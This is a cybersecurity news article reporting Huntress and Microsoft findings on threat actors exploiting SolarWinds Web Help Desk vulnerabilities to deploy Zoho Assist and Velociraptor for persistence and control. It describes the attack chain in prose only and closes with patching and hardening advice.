Another active exploitation of SolarWinds Web Help Desk detected

Huntress researchers are seeing threat actors exploiting the SolarWinds Web Help Desk vulnerability across three customers. It’s stemming from the recently disclosed flaws affecting the tool.

It’s not been a good week for SolarWinds, a popular IT ticketing software used widely by the US federal government and many private education and healthcare organizations.

First, a remote code execution vulnerability, tracked as CVE-2025-40551, was added to CISA’s Known Exploited Vulnerabilities Catalog.

Then, the Microsoft Defender Research Team also discussed CVE-2025-26399 and said it observed a multi‑stage intrusion where threat actors exploited the internet‑exposed SolarWinds Web Help Desk instances.

CISA also warned that the vulnerability was being actively exploited. That’s indeed true – active weaponization of a legitimate but heavily abused administrative tool is now accelerating.

Late last week, Huntress analyst Dipo Rodipe investigated a case of SolarWinds Web Help Desk exploitation, in which the threat actor rapidly deployed Zoho Meetings and Cloudflare tunnels for persistence, as well as Velociraptor for means of command and control.

The attack chain began with wrapper.exe, the WHD service wrapper, spawning java.exe, the underlying Tomcat-based application. From there, the Java process executed cmd.exe to silently install a remote MSI payload.

The latter delivered a Zoho ManageEngine RMM (Zoho Assist) agent staged via the Catbox file-hosting service.

While Zoho Assist is a legitimate remote management tool, it has become a common post-exploitation choice due to its ability to provide persistent, unattended access.

In this case, the agent was registered to an attacker-controlled Zoho account linked to a Proton Mail address, enabling immediate interactive control.

According to Huntress, the campaign shows how quickly attackers can move from a single internet-exposed management interface to full interactive control, persistence, and enterprise-wide visibility.

This activity aligns closely with Microsoft’s February 6th advisory confirming in-the-wild exploitation of SolarWinds WHD vulnerabilities for remote code execution and follow-on tooling deployment.

Once the RMM agent was active, the threat actor pivoted to hands-on keyboard activity and initiated Active Directory reconnaissance, Huntress explained in a blog post. Essentially, this means mapping domain-joined systems and prioritizing targets.

Then, the attacker deployed Velociraptor, an open-source Digital Forensics and Incident Response platform. It’s designed for defenders, but its ability to execute commands, collect artifacts, and remotely control endpoints makes it an effective command-and-control framework when misused.

Interestingly, the observed deployment used Velociraptor version 0.73.4, an outdated release with a known privilege escalation vulnerability that has appeared in prior campaigns.

The Velociraptor client communicated with attacker infrastructure hosted behind a Cloudflare Worker, and with Velociraptor then running as a Windows service, the attacker executed a rapid sequence of base64-encoded PowerShell commands.

According to Huntress, the campaign shows how quickly attackers can move from a single internet-exposed management interface to full interactive control, persistence, and enterprise-wide visibility.

Needless to say, organizations running SolarWinds should urgently update to versions remediating the vulnerabilities. All prior versions should be considered vulnerable.

Plus, Web Help Desk administrative interfaces shouldn’t be publicly accessible – users should place the tool behind a VPN or firewall and remove direct internet access to admin paths. Passwords should also be reset for all relevant accounts.

---

Unlock more exclusive Cybernews content on YouTube